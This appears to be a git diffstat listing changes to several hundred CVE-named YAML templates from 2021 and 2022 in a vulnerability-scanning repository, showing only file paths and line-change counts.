http/cves/2021/CVE-2021-22502.yaml | 3 +- http/cves/2021/CVE-2021-22707.yaml | 10 ++ http/cves/2021/CVE-2021-22873.yaml | 3 +- http/cves/2021/CVE-2021-22911.yaml | 3 +- http/cves/2021/CVE-2021-22986.yaml | 1 + http/cves/2021/CVE-2021-23241.yaml | 3 +- http/cves/2021/CVE-2021-24145.yaml | 3 +- http/cves/2021/CVE-2021-24146.yaml | 1 + http/cves/2021/CVE-2021-24150.yaml | 3 +- http/cves/2021/CVE-2021-24155.yaml | 3 +- http/cves/2021/CVE-2021-24165.yaml | 1 + http/cves/2021/CVE-2021-24169.yaml | 1 + http/cves/2021/CVE-2021-24176.yaml | 1 + http/cves/2021/CVE-2021-24210.yaml | 1 + http/cves/2021/CVE-2021-24214.yaml | 1 + http/cves/2021/CVE-2021-24226.yaml | 1 + http/cves/2021/CVE-2021-24227.yaml | 1 + http/cves/2021/CVE-2021-24235.yaml | 1 + http/cves/2021/CVE-2021-24236.yaml | 3 +- http/cves/2021/CVE-2021-24237.yaml | 1 + http/cves/2021/CVE-2021-24239.yaml | 1 + http/cves/2021/CVE-2021-24245.yaml | 1 + http/cves/2021/CVE-2021-24274.yaml | 1 + http/cves/2021/CVE-2021-24275.yaml | 1 + http/cves/2021/CVE-2021-24276.yaml | 1 + http/cves/2021/CVE-2021-24278.yaml | 1 + http/cves/2021/CVE-2021-24284.yaml | 3 +- http/cves/2021/CVE-2021-24285.yaml | 3 +- http/cves/2021/CVE-2021-24287.yaml | 1 + http/cves/2021/CVE-2021-24288.yaml | 1 + http/cves/2021/CVE-2021-24291.yaml | 1 + http/cves/2021/CVE-2021-24298.yaml | 1 + http/cves/2021/CVE-2021-24300.yaml | 1 + http/cves/2021/CVE-2021-24316.yaml | 1 + http/cves/2021/CVE-2021-24320.yaml | 1 + http/cves/2021/CVE-2021-24335.yaml | 1 + http/cves/2021/CVE-2021-24340.yaml | 3 +- http/cves/2021/CVE-2021-24342.yaml | 1 + http/cves/2021/CVE-2021-24347.yaml | 3 +- http/cves/2021/CVE-2021-24351.yaml | 1 + http/cves/2021/CVE-2021-24358.yaml | 1 + http/cves/2021/CVE-2021-24364.yaml | 1 + http/cves/2021/CVE-2021-24370.yaml | 3 +- http/cves/2021/CVE-2021-24387.yaml | 1 + http/cves/2021/CVE-2021-24389.yaml | 1 + http/cves/2021/CVE-2021-24406.yaml | 1 + http/cves/2021/CVE-2021-24407.yaml | 1 + http/cves/2021/CVE-2021-24409.yaml | 13 ++- http/cves/2021/CVE-2021-24435.yaml | 1 + http/cves/2021/CVE-2021-24436.yaml | 1 + http/cves/2021/CVE-2021-24452.yaml | 1 + http/cves/2021/CVE-2021-24472.yaml | 3 +- http/cves/2021/CVE-2021-24488.yaml | 1 + http/cves/2021/CVE-2021-24495.yaml | 1 + http/cves/2021/CVE-2021-24498.yaml | 1 + http/cves/2021/CVE-2021-24499.yaml | 1 + http/cves/2021/CVE-2021-24510.yaml | 1 + http/cves/2021/CVE-2021-24554.yaml | 3 +- http/cves/2021/CVE-2021-24647.yaml | 1 + http/cves/2021/CVE-2021-24666.yaml | 1 + http/cves/2021/CVE-2021-24731.yaml | 3 +- http/cves/2021/CVE-2021-24746.yaml | 1 + http/cves/2021/CVE-2021-24750.yaml | 3 +- http/cves/2021/CVE-2021-24762.yaml | 3 +- http/cves/2021/CVE-2021-24827.yaml | 3 +- http/cves/2021/CVE-2021-24838.yaml | 3 +- http/cves/2021/CVE-2021-24862.yaml | 3 +- http/cves/2021/CVE-2021-24875.yaml | 1 + http/cves/2021/CVE-2021-24891.yaml | 1 + http/cves/2021/CVE-2021-24910.yaml | 3 +- http/cves/2021/CVE-2021-24917.yaml | 3 +- http/cves/2021/CVE-2021-24926.yaml | 3 +- http/cves/2021/CVE-2021-24931.yaml | 3 +- http/cves/2021/CVE-2021-24940.yaml | 3 +- http/cves/2021/CVE-2021-24946.yaml | 3 +- http/cves/2021/CVE-2021-24947.yaml | 3 +- http/cves/2021/CVE-2021-24956.yaml | 13 ++- http/cves/2021/CVE-2021-24970.yaml | 3 +- http/cves/2021/CVE-2021-24987.yaml | 1 + http/cves/2021/CVE-2021-24991.yaml | 3 +- http/cves/2021/CVE-2021-24997.yaml | 3 +- http/cves/2021/CVE-2021-25003.yaml | 3 +- http/cves/2021/CVE-2021-25008.yaml | 3 +- http/cves/2021/CVE-2021-25028.yaml | 3 +- http/cves/2021/CVE-2021-25033.yaml | 3 +- http/cves/2021/CVE-2021-25052.yaml | 3 +- http/cves/2021/CVE-2021-25055.yaml | 3 +- http/cves/2021/CVE-2021-25063.yaml | 3 +- http/cves/2021/CVE-2021-25065.yaml | 10 +- http/cves/2021/CVE-2021-25067.yaml | 3 +- http/cves/2021/CVE-2021-25074.yaml | 3 +- http/cves/2021/CVE-2021-25075.yaml | 1 + http/cves/2021/CVE-2021-25078.yaml | 3 +- http/cves/2021/CVE-2021-25085.yaml | 3 +- http/cves/2021/CVE-2021-25099.yaml | 3 +- http/cves/2021/CVE-2021-25104.yaml | 3 +- http/cves/2021/CVE-2021-25111.yaml | 3 +- http/cves/2021/CVE-2021-25112.yaml | 3 +- http/cves/2021/CVE-2021-25114.yaml | 3 +- http/cves/2021/CVE-2021-25118.yaml | 3 +- http/cves/2021/CVE-2021-25120.yaml | 3 +- http/cves/2021/CVE-2021-25281.yaml | 3 +- http/cves/2021/CVE-2021-25296.yaml | 3 +- http/cves/2021/CVE-2021-25297.yaml | 3 +- http/cves/2021/CVE-2021-25298.yaml | 3 +- http/cves/2021/CVE-2021-25299.yaml | 1 + http/cves/2021/CVE-2021-25646.yaml | 3 +- http/cves/2021/CVE-2021-25864.yaml | 9 +- http/cves/2021/CVE-2021-25899.yaml | 3 +- http/cves/2021/CVE-2021-26084.yaml | 5 +- http/cves/2021/CVE-2021-26085.yaml | 5 +- http/cves/2021/CVE-2021-26086.yaml | 1 + http/cves/2021/CVE-2021-26247.yaml | 3 +- http/cves/2021/CVE-2021-26295.yaml | 3 +- http/cves/2021/CVE-2021-26475.yaml | 1 + http/cves/2021/CVE-2021-26598.yaml | 3 +- http/cves/2021/CVE-2021-26702.yaml | 1 + http/cves/2021/CVE-2021-26710.yaml | 1 + http/cves/2021/CVE-2021-26723.yaml | 3 +- http/cves/2021/CVE-2021-26812.yaml | 1 + http/cves/2021/CVE-2021-26855.yaml | 3 +- http/cves/2021/CVE-2021-27124.yaml | 3 +- http/cves/2021/CVE-2021-27132.yaml | 3 +- http/cves/2021/CVE-2021-27309.yaml | 1 + http/cves/2021/CVE-2021-27310.yaml | 1 + http/cves/2021/CVE-2021-27314.yaml | 3 +- http/cves/2021/CVE-2021-27315.yaml | 3 +- http/cves/2021/CVE-2021-27316.yaml | 3 +- http/cves/2021/CVE-2021-27319.yaml | 3 +- http/cves/2021/CVE-2021-27320.yaml | 3 +- http/cves/2021/CVE-2021-27330.yaml | 3 +- http/cves/2021/CVE-2021-27358.yaml | 1 + http/cves/2021/CVE-2021-27519.yaml | 1 + http/cves/2021/CVE-2021-27520.yaml | 1 + http/cves/2021/CVE-2021-27561.yaml | 5 +- http/cves/2021/CVE-2021-27651.yaml | 3 +- http/cves/2021/CVE-2021-27670.yaml | 10 +- http/cves/2021/CVE-2021-27748.yaml | 1 + http/cves/2021/CVE-2021-27850.yaml | 5 +- http/cves/2021/CVE-2021-27905.yaml | 1 + http/cves/2021/CVE-2021-27909.yaml | 1 + http/cves/2021/CVE-2021-27931.yaml | 3 +- http/cves/2021/CVE-2021-28073.yaml | 4 +- http/cves/2021/CVE-2021-28149.yaml | 3 +- http/cves/2021/CVE-2021-28150.yaml | 1 + http/cves/2021/CVE-2021-28151.yaml | 1 + http/cves/2021/CVE-2021-28164.yaml | 1 + http/cves/2021/CVE-2021-28169.yaml | 1 + http/cves/2021/CVE-2021-28377.yaml | 3 +- http/cves/2021/CVE-2021-28419.yaml | 3 +- http/cves/2021/CVE-2021-28854.yaml | 6 +- http/cves/2021/CVE-2021-28918.yaml | 5 +- http/cves/2021/CVE-2021-28937.yaml | 1 + http/cves/2021/CVE-2021-29156.yaml | 3 +- http/cves/2021/CVE-2021-29203.yaml | 3 +- http/cves/2021/CVE-2021-29441.yaml | 3 +- http/cves/2021/CVE-2021-29442.yaml | 3 +- http/cves/2021/CVE-2021-29484.yaml | 1 + http/cves/2021/CVE-2021-29490.yaml | 1 + http/cves/2021/CVE-2021-29505.yaml | 1 + http/cves/2021/CVE-2021-29622.yaml | 1 + http/cves/2021/CVE-2021-29625.yaml | 1 + http/cves/2021/CVE-2021-3002.yaml | 1 + http/cves/2021/CVE-2021-30049.yaml | 1 + http/cves/2021/CVE-2021-30128.yaml | 3 +- http/cves/2021/CVE-2021-30134.yaml | 3 +- http/cves/2021/CVE-2021-30151.yaml | 1 + http/cves/2021/CVE-2021-3017.yaml | 1 + http/cves/2021/CVE-2021-30175.yaml | 1 + http/cves/2021/CVE-2021-3019.yaml | 3 +- http/cves/2021/CVE-2021-30213.yaml | 1 + http/cves/2021/CVE-2021-30461.yaml | 3 +- http/cves/2021/CVE-2021-30497.yaml | 1 + http/cves/2021/CVE-2021-3110.yaml | 3 +- http/cves/2021/CVE-2021-31195.yaml | 9 +- http/cves/2021/CVE-2021-31249.yaml | 4 +- http/cves/2021/CVE-2021-31250.yaml | 1 + http/cves/2021/CVE-2021-3129.yaml | 3 +- http/cves/2021/CVE-2021-31537.yaml | 1 + http/cves/2021/CVE-2021-31581.yaml | 3 +- http/cves/2021/CVE-2021-31589.yaml | 3 +- http/cves/2021/CVE-2021-31602.yaml | 1 + http/cves/2021/CVE-2021-31682.yaml | 1 + http/cves/2021/CVE-2021-31755.yaml | 1 + http/cves/2021/CVE-2021-31805.yaml | 3 +- http/cves/2021/CVE-2021-31856.yaml | 1 + http/cves/2021/CVE-2021-31862.yaml | 3 +- http/cves/2021/CVE-2021-32030.yaml | 3 +- http/cves/2021/CVE-2021-32172.yaml | 3 +- http/cves/2021/CVE-2021-3223.yaml | 1 + http/cves/2021/CVE-2021-32305.yaml | 3 +- http/cves/2021/CVE-2021-32618.yaml | 1 + http/cves/2021/CVE-2021-32682.yaml | 3 +- http/cves/2021/CVE-2021-32789.yaml | 3 +- http/cves/2021/CVE-2021-32819.yaml | 3 +- http/cves/2021/CVE-2021-32820.yaml | 3 +- http/cves/2021/CVE-2021-32853.yaml | 3 +- http/cves/2021/CVE-2021-3293.yaml | 1 + http/cves/2021/CVE-2021-3297.yaml | 1 + http/cves/2021/CVE-2021-33044.yaml | 3 +- http/cves/2021/CVE-2021-33221.yaml | 1 + http/cves/2021/CVE-2021-33357.yaml | 3 +- http/cves/2021/CVE-2021-33544.yaml | 3 +- http/cves/2021/CVE-2021-33564.yaml | 3 +- http/cves/2021/CVE-2021-3374.yaml | 1 + http/cves/2021/CVE-2021-3377.yaml | 1 + http/cves/2021/CVE-2021-3378.yaml | 3 +- http/cves/2021/CVE-2021-33807.yaml | 3 +- http/cves/2021/CVE-2021-33851.yaml | 1 + http/cves/2021/CVE-2021-33904.yaml | 1 + http/cves/2021/CVE-2021-34370.yaml | 1 + http/cves/2021/CVE-2021-34429.yaml | 3 +- http/cves/2021/CVE-2021-34473.yaml | 3 +- http/cves/2021/CVE-2021-34621.yaml | 1 + http/cves/2021/CVE-2021-34640.yaml | 1 + http/cves/2021/CVE-2021-34643.yaml | 1 + http/cves/2021/CVE-2021-34805.yaml | 3 +- http/cves/2021/CVE-2021-35250.yaml | 5 +- http/cves/2021/CVE-2021-35265.yaml | 3 +- http/cves/2021/CVE-2021-35336.yaml | 1 + http/cves/2021/CVE-2021-35380.yaml | 3 +- http/cves/2021/CVE-2021-35464.yaml | 5 +- http/cves/2021/CVE-2021-35488.yaml | 1 + http/cves/2021/CVE-2021-35587.yaml | 3 +- http/cves/2021/CVE-2021-3577.yaml | 3 +- http/cves/2021/CVE-2021-36260.yaml | 4 +- http/cves/2021/CVE-2021-36356.yaml | 3 +- http/cves/2021/CVE-2021-36380.yaml | 3 +- http/cves/2021/CVE-2021-36450.yaml | 1 + http/cves/2021/CVE-2021-3654.yaml | 3 +- http/cves/2021/CVE-2021-36580.yaml | 11 +- http/cves/2021/CVE-2021-36748.yaml | 1 + http/cves/2021/CVE-2021-36749.yaml | 3 +- http/cves/2021/CVE-2021-36873.yaml | 1 + http/cves/2021/CVE-2021-37216.yaml | 1 + http/cves/2021/CVE-2021-37304.yaml | 1 + http/cves/2021/CVE-2021-37305.yaml | 1 + http/cves/2021/CVE-2021-37416.yaml | 1 + http/cves/2021/CVE-2021-37538.yaml | 3 +- http/cves/2021/CVE-2021-37573.yaml | 1 + http/cves/2021/CVE-2021-37580.yaml | 3 +- http/cves/2021/CVE-2021-37589.yaml | 1 + http/cves/2021/CVE-2021-37704.yaml | 3 +- http/cves/2021/CVE-2021-37833.yaml | 1 + http/cves/2021/CVE-2021-38314.yaml | 1 + http/cves/2021/CVE-2021-38540.yaml | 3 +- http/cves/2021/CVE-2021-38647.yaml | 5 +- http/cves/2021/CVE-2021-38702.yaml | 1 + http/cves/2021/CVE-2021-38704.yaml | 1 + http/cves/2021/CVE-2021-38751.yaml | 1 + http/cves/2021/CVE-2021-39141.yaml | 3 +- http/cves/2021/CVE-2021-39144.yaml | 1 + http/cves/2021/CVE-2021-39146.yaml | 3 +- http/cves/2021/CVE-2021-39152.yaml | 1 + http/cves/2021/CVE-2021-39165.yaml | 3 +- http/cves/2021/CVE-2021-39211.yaml | 3 +- http/cves/2021/CVE-2021-39226.yaml | 1 + http/cves/2021/CVE-2021-39312.yaml | 3 +- http/cves/2021/CVE-2021-39316.yaml | 1 + http/cves/2021/CVE-2021-39320.yaml | 1 + http/cves/2021/CVE-2021-39322.yaml | 1 + http/cves/2021/CVE-2021-39327.yaml | 1 + http/cves/2021/CVE-2021-39350.yaml | 1 + http/cves/2021/CVE-2021-39433.yaml | 1 + http/cves/2021/CVE-2021-39501.yaml | 1 + http/cves/2021/CVE-2021-40149.yaml | 3 +- http/cves/2021/CVE-2021-40150.yaml | 3 +- http/cves/2021/CVE-2021-40323.yaml | 3 +- http/cves/2021/CVE-2021-40438.yaml | 3 +- http/cves/2021/CVE-2021-40539.yaml | 5 +- http/cves/2021/CVE-2021-40542.yaml | 3 +- http/cves/2021/CVE-2021-40661.yaml | 3 +- http/cves/2021/CVE-2021-40822.yaml | 1 + http/cves/2021/CVE-2021-40856.yaml | 3 +- http/cves/2021/CVE-2021-40859.yaml | 1 + http/cves/2021/CVE-2021-40868.yaml | 1 + http/cves/2021/CVE-2021-40870.yaml | 5 +- http/cves/2021/CVE-2021-40875.yaml | 3 +- http/cves/2021/CVE-2021-40908.yaml | 3 +- http/cves/2021/CVE-2021-40960.yaml | 3 +- http/cves/2021/CVE-2021-40968.yaml | 3 +- http/cves/2021/CVE-2021-40969.yaml | 3 +- http/cves/2021/CVE-2021-40970.yaml | 3 +- http/cves/2021/CVE-2021-40971.yaml | 3 +- http/cves/2021/CVE-2021-40972.yaml | 3 +- http/cves/2021/CVE-2021-40973.yaml | 3 +- http/cves/2021/CVE-2021-40978.yaml | 1 + http/cves/2021/CVE-2021-41174.yaml | 3 +- http/cves/2021/CVE-2021-41192.yaml | 3 +- http/cves/2021/CVE-2021-41266.yaml | 3 +- http/cves/2021/CVE-2021-41277.yaml | 5 +- http/cves/2021/CVE-2021-41282.yaml | 3 +- http/cves/2021/CVE-2021-41291.yaml | 3 +- http/cves/2021/CVE-2021-41293.yaml | 3 +- http/cves/2021/CVE-2021-41349.yaml | 3 +- http/cves/2021/CVE-2021-41381.yaml | 3 +- http/cves/2021/CVE-2021-41432.yaml | 1 + http/cves/2021/CVE-2021-41460.yaml | 9 +- http/cves/2021/CVE-2021-41467.yaml | 3 +- http/cves/2021/CVE-2021-41569.yaml | 1 + http/cves/2021/CVE-2021-41648.yaml | 3 +- http/cves/2021/CVE-2021-41649.yaml | 3 +- http/cves/2021/CVE-2021-41653.yaml | 3 +- http/cves/2021/CVE-2021-41691.yaml | 6 +- http/cves/2021/CVE-2021-41773.yaml | 1 + http/cves/2021/CVE-2021-41826.yaml | 1 + http/cves/2021/CVE-2021-41878.yaml | 1 + http/cves/2021/CVE-2021-4191.yaml | 3 +- http/cves/2021/CVE-2021-41951.yaml | 1 + http/cves/2021/CVE-2021-42013.yaml | 3 +- http/cves/2021/CVE-2021-42063.yaml | 3 +- http/cves/2021/CVE-2021-42071.yaml | 3 +- http/cves/2021/CVE-2021-42192.yaml | 1 + http/cves/2021/CVE-2021-42237.yaml | 3 +- http/cves/2021/CVE-2021-42258.yaml | 3 +- http/cves/2021/CVE-2021-42551.yaml | 3 +- http/cves/2021/CVE-2021-42565.yaml | 1 + http/cves/2021/CVE-2021-42566.yaml | 1 + http/cves/2021/CVE-2021-42567.yaml | 1 + http/cves/2021/CVE-2021-42627.yaml | 3 +- http/cves/2021/CVE-2021-42663.yaml | 1 + http/cves/2021/CVE-2021-42667.yaml | 3 +- http/cves/2021/CVE-2021-42887.yaml | 3 +- http/cves/2021/CVE-2021-43062.yaml | 3 +- http/cves/2021/CVE-2021-43287.yaml | 3 +- http/cves/2021/CVE-2021-43421.yaml | 1 + http/cves/2021/CVE-2021-43495.yaml | 1 + http/cves/2021/CVE-2021-43496.yaml | 1 + http/cves/2021/CVE-2021-43510.yaml | 3 +- http/cves/2021/CVE-2021-43574.yaml | 1 + http/cves/2021/CVE-2021-43725.yaml | 3 +- http/cves/2021/CVE-2021-43734.yaml | 3 +- http/cves/2021/CVE-2021-43778.yaml | 3 +- http/cves/2021/CVE-2021-43798.yaml | 3 +- http/cves/2021/CVE-2021-43810.yaml | 3 +- http/cves/2021/CVE-2021-44077.yaml | 5 +- http/cves/2021/CVE-2021-44138.yaml | 3 +- http/cves/2021/CVE-2021-44139.yaml | 4 + http/cves/2021/CVE-2021-44152.yaml | 7 +- http/cves/2021/CVE-2021-44228.yaml | 3 +- http/cves/2021/CVE-2021-44427.yaml | 3 +- http/cves/2021/CVE-2021-44451.yaml | 3 +- http/cves/2021/CVE-2021-44515.yaml | 3 +- http/cves/2021/CVE-2021-44528.yaml | 3 +- http/cves/2021/CVE-2021-44529.yaml | 3 +- http/cves/2021/CVE-2021-44848.yaml | 1 + http/cves/2021/CVE-2021-45043.yaml | 3 +- http/cves/2021/CVE-2021-45046.yaml | 11 +- http/cves/2021/CVE-2021-45092.yaml | 3 +- http/cves/2021/CVE-2021-45232.yaml | 3 +- http/cves/2021/CVE-2021-45380.yaml | 3 +- http/cves/2021/CVE-2021-45422.yaml | 3 +- http/cves/2021/CVE-2021-45428.yaml | 3 +- http/cves/2021/CVE-2021-45967.yaml | 3 +- http/cves/2021/CVE-2021-45968.yaml | 3 +- http/cves/2021/CVE-2021-46005.yaml | 3 +- http/cves/2021/CVE-2021-46068.yaml | 3 +- http/cves/2021/CVE-2021-46069.yaml | 3 +- http/cves/2021/CVE-2021-46071.yaml | 3 +- http/cves/2021/CVE-2021-46072.yaml | 3 +- http/cves/2021/CVE-2021-46073.yaml | 3 +- http/cves/2021/CVE-2021-46379.yaml | 3 +- http/cves/2021/CVE-2021-46381.yaml | 3 +- http/cves/2021/CVE-2021-46387.yaml | 3 +- http/cves/2021/CVE-2021-46417.yaml | 3 +- http/cves/2021/CVE-2021-46422.yaml | 1 + http/cves/2021/CVE-2021-46424.yaml | 1 + http/cves/2021/CVE-2021-46704.yaml | 3 +- http/cves/2022/CVE-2022-0140.yaml | 5 +- http/cves/2022/CVE-2022-0147.yaml | 3 +- http/cves/2022/CVE-2022-0148.yaml | 3 +- http/cves/2022/CVE-2022-0149.yaml | 3 +- http/cves/2022/CVE-2022-0150.yaml | 3 +- http/cves/2022/CVE-2022-0165.yaml | 3 +- http/cves/2022/CVE-2022-0169.yaml | 15 ++- http/cves/2022/CVE-2022-0189.yaml | 3 +- http/cves/2022/CVE-2022-0201.yaml | 3 +- http/cves/2022/CVE-2022-0206.yaml | 3 +- http/cves/2022/CVE-2022-0208.yaml | 3 +- http/cves/2022/CVE-2022-0212.yaml | 3 +- http/cves/2022/CVE-2022-0218.yaml | 3 +- http/cves/2022/CVE-2022-0220.yaml | 3 +- http/cves/2022/CVE-2022-0234.yaml | 3 +- http/cves/2022/CVE-2022-0271.yaml | 1 + http/cves/2022/CVE-2022-0281.yaml | 3 +- http/cves/2022/CVE-2022-0288.yaml | 3 +- http/cves/2022/CVE-2022-0346.yaml | 1 + http/cves/2022/CVE-2022-0349.yaml | 3 +- http/cves/2022/CVE-2022-0378.yaml | 3 +- http/cves/2022/CVE-2022-0381.yaml | 3 +- http/cves/2022/CVE-2022-0412.yaml | 3 +- http/cves/2022/CVE-2022-0415.yaml | 3 +- http/cves/2022/CVE-2022-0422.yaml | 3 +- http/cves/2022/CVE-2022-0432.yaml | 3 +- http/cves/2022/CVE-2022-0434.yaml | 3 +- http/cves/2022/CVE-2022-0437.yaml | 3 +- http/cves/2022/CVE-2022-0441.yaml | 3 +- http/cves/2022/CVE-2022-0482.yaml | 3 +- http/cves/2022/CVE-2022-0535.yaml | 1 + http/cves/2022/CVE-2022-0540.yaml | 3 +- http/cves/2022/CVE-2022-0591.yaml | 1 + http/cves/2022/CVE-2022-0594.yaml | 3 +- http/cves/2022/CVE-2022-0595.yaml | 1 + http/cves/2022/CVE-2022-0599.yaml | 1 + http/cves/2022/CVE-2022-0653.yaml | 3 +- http/cves/2022/CVE-2022-0656.yaml | 3 +- http/cves/2022/CVE-2022-0660.yaml | 3 +- http/cves/2022/CVE-2022-0678.yaml | 3 +- http/cves/2022/CVE-2022-0679.yaml | 3 +- http/cves/2022/CVE-2022-0692.yaml | 3 +- http/cves/2022/CVE-2022-0693.yaml | 3 +- http/cves/2022/CVE-2022-0735.yaml | 4 +- http/cves/2022/CVE-2022-0747.yaml | 1 + http/cves/2022/CVE-2022-0760.yaml | 1 + http/cves/2022/CVE-2022-0769.yaml | 3 +- http/cves/2022/CVE-2022-0773.yaml | 3 +- http/cves/2022/CVE-2022-0776.yaml | 3 +- http/cves/2022/CVE-2022-0781.yaml | 3 +- http/cves/2022/CVE-2022-0784.yaml | 1 + http/cves/2022/CVE-2022-0785.yaml | 1 + http/cves/2022/CVE-2022-0786.yaml | 3 +- http/cves/2022/CVE-2022-0788.yaml | 3 +- http/cves/2022/CVE-2022-0817.yaml | 3 +- http/cves/2022/CVE-2022-0824.yaml | 3 +- http/cves/2022/CVE-2022-0826.yaml | 3 +- http/cves/2022/CVE-2022-0827.yaml | 3 +- http/cves/2022/CVE-2022-0846.yaml | 1 + http/cves/2022/CVE-2022-0864.yaml | 1 + http/cves/2022/CVE-2022-0867.yaml | 3 +- http/cves/2022/CVE-2022-0869.yaml | 3 +- http/cves/2022/CVE-2022-0870.yaml | 3 +- http/cves/2022/CVE-2022-0885.yaml | 5 +- http/cves/2022/CVE-2022-0928.yaml | 1 + http/cves/2022/CVE-2022-0948.yaml | 3 +- http/cves/2022/CVE-2022-0949.yaml | 1 + http/cves/2022/CVE-2022-0952.yaml | 3 +- http/cves/2022/CVE-2022-0954.yaml | 1 + http/cves/2022/CVE-2022-0963.yaml | 1 + http/cves/2022/CVE-2022-0968.yaml | 1 + http/cves/2022/CVE-2022-1007.yaml | 1 + http/cves/2022/CVE-2022-1013.yaml | 3 +- http/cves/2022/CVE-2022-1020.yaml | 1 + http/cves/2022/CVE-2022-1040.yaml | 3 +- http/cves/2022/CVE-2022-1054.yaml | 3 +- http/cves/2022/CVE-2022-1057.yaml | 3 +- http/cves/2022/CVE-2022-1058.yaml | 1 + http/cves/2022/CVE-2022-1119.yaml | 3 +- http/cves/2022/CVE-2022-1162.yaml | 1 + http/cves/2022/CVE-2022-1168.yaml | 1 + http/cves/2022/CVE-2022-1221.yaml | 1 + http/cves/2022/CVE-2022-1329.yaml | 3 +- http/cves/2022/CVE-2022-1386.yaml | 3 +- http/cves/2022/CVE-2022-1388.yaml | 3 +- http/cves/2022/CVE-2022-1390.yaml | 3 +- http/cves/2022/CVE-2022-1391.yaml | 3 +- http/cves/2022/CVE-2022-1392.yaml | 3 +- http/cves/2022/CVE-2022-1398.yaml | 3 +- http/cves/2022/CVE-2022-1439.yaml | 3 +- http/cves/2022/CVE-2022-1442.yaml | 3 +- http/cves/2022/CVE-2022-1574.yaml | 3 +- http/cves/2022/CVE-2022-1595.yaml | 3 +- http/cves/2022/CVE-2022-1597.yaml | 1 + http/cves/2022/CVE-2022-1598.yaml | 3 +- http/cves/2022/CVE-2022-1609.yaml | 11 +- http/cves/2022/CVE-2022-1713.yaml | 3 +- http/cves/2022/CVE-2022-1724.yaml | 3 +- http/cves/2022/CVE-2022-1756.yaml | 10 +- http/cves/2022/CVE-2022-1768.yaml | 3 +- http/cves/2022/CVE-2022-1815.yaml | 3 +- http/cves/2022/CVE-2022-1883.yaml | 3 +- http/cves/2022/CVE-2022-1903.yaml | 3 +- http/cves/2022/CVE-2022-1904.yaml | 1 + http/cves/2022/CVE-2022-1906.yaml | 3 +- http/cves/2022/CVE-2022-1910.yaml | 3 +- http/cves/2022/CVE-2022-1916.yaml | 1 + http/cves/2022/CVE-2022-1933.yaml | 3 +- http/cves/2022/CVE-2022-1937.yaml | 3 +- http/cves/2022/CVE-2022-1946.yaml | 1 + http/cves/2022/CVE-2022-1952.yaml | 3 +- http/cves/2022/CVE-2022-2034.yaml | 3 +- http/cves/2022/CVE-2022-21371.yaml | 3 +- http/cves/2022/CVE-2022-21500.yaml | 3 +- http/cves/2022/CVE-2022-21587.yaml | 5 +- http/cves/2022/CVE-2022-21661.yaml | 3 +- http/cves/2022/CVE-2022-21705.yaml | 10 +- http/cves/2022/CVE-2022-2185.yaml | 5 +- http/cves/2022/CVE-2022-2187.yaml | 3 +- http/cves/2022/CVE-2022-2219.yaml | 3 +- http/cves/2022/CVE-2022-22242.yaml | 3 +- http/cves/2022/CVE-2022-22536.yaml | 3 +- http/cves/2022/CVE-2022-22733.yaml | 3 +- http/cves/2022/CVE-2022-22897.yaml | 10 +- http/cves/2022/CVE-2022-2290.yaml | 3 +- http/cves/2022/CVE-2022-22947.yaml | 5 +- http/cves/2022/CVE-2022-22954.yaml | 3 +- http/cves/2022/CVE-2022-22963.yaml | 3 +- http/cves/2022/CVE-2022-22965.yaml | 3 +- http/cves/2022/CVE-2022-22972.yaml | 3 +- http/cves/2022/CVE-2022-23102.yaml | 8 +- http/cves/2022/CVE-2022-23131.yaml | 3 +- http/cves/2022/CVE-2022-23134.yaml | 3 +- http/cves/2022/CVE-2022-2314.yaml | 3 +- http/cves/2022/CVE-2022-23178.yaml | 3 +- http/cves/2022/CVE-2022-23347.yaml | 3 +- http/cves/2022/CVE-2022-23348.yaml | 3 +- http/cves/2022/CVE-2022-23544.yaml | 1 + http/cves/2022/CVE-2022-2373.yaml | 3 +- http/cves/2022/CVE-2022-2376.yaml | 3 +- http/cves/2022/CVE-2022-23779.yaml | 3 +- http/cves/2022/CVE-2022-2379.yaml | 3 +- http/cves/2022/CVE-2022-23808.yaml | 3 +- http/cves/2022/CVE-2022-2383.yaml | 3 +- http/cves/2022/CVE-2022-23854.yaml | 5 +- http/cves/2022/CVE-2022-23881.yaml | 1 + http/cves/2022/CVE-2022-23898.yaml | 3 +- http/cves/2022/CVE-2022-23944.yaml | 3 +- http/cves/2022/CVE-2022-24112.yaml | 3 +- http/cves/2022/CVE-2022-24124.yaml | 3 +- http/cves/2022/CVE-2022-24129.yaml | 3 +- http/cves/2022/CVE-2022-2414.yaml | 5 + http/cves/2022/CVE-2022-24181.yaml | 1 + http/cves/2022/CVE-2022-24223.yaml | 3 +- http/cves/2022/CVE-2022-24260.yaml | 3 +- http/cves/2022/CVE-2022-24264.yaml | 3 +- http/cves/2022/CVE-2022-24265.yaml | 3 +- http/cves/2022/CVE-2022-24266.yaml | 3 +- http/cves/2022/CVE-2022-24288.yaml | 3 +- http/cves/2022/CVE-2022-24384.yaml | 5 +- http/cves/2022/CVE-2022-2462.yaml | 3 +- http/cves/2022/CVE-2022-2467.yaml | 3 +- http/cves/2022/CVE-2022-24681.yaml | 1 + http/cves/2022/CVE-2022-24716.yaml | 3 +- http/cves/2022/CVE-2022-24816.yaml | 3 +- http/cves/2022/CVE-2022-24856.yaml | 3 +- http/cves/2022/CVE-2022-2486.yaml | 3 +- http/cves/2022/CVE-2022-2487.yaml | 3 +- http/cves/2022/CVE-2022-2488.yaml | 3 +- http/cves/2022/CVE-2022-24899.yaml | 3 +- http/cves/2022/CVE-2022-24900.yaml | 5 +- http/cves/2022/CVE-2022-24990.yaml | 4 +- http/cves/2022/CVE-2022-25082.yaml | 5 +- http/cves/2022/CVE-2022-25125.yaml | 3 +- http/cves/2022/CVE-2022-25216.yaml | 3 +- http/cves/2022/CVE-2022-25323.yaml | 3 +- http/cves/2022/CVE-2022-25356.yaml | 1 + http/cves/2022/CVE-2022-25369.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 3 +- http/cves/2022/CVE-2022-2546.yaml | 1 + http/cves/2022/CVE-2022-25481.yaml | 1 + http/cves/2022/CVE-2022-25485.yaml | 3 +- http/cves/2022/CVE-2022-25486.yaml | 3 +- http/cves/2022/CVE-2022-25487.yaml | 3 +- http/cves/2022/CVE-2022-25488.yaml | 3 +- http/cves/2022/CVE-2022-25489.yaml | 3 +- http/cves/2022/CVE-2022-25497.yaml | 3 +- http/cves/2022/CVE-2022-2551.yaml | 3 +- http/cves/2022/CVE-2022-2599.yaml | 3 +- http/cves/2022/CVE-2022-26134.yaml | 5 +- http/cves/2022/CVE-2022-26138.yaml | 3 +- http/cves/2022/CVE-2022-26148.yaml | 3 +- http/cves/2022/CVE-2022-26159.yaml | 5 +- http/cves/2022/CVE-2022-26233.yaml | 3 +- 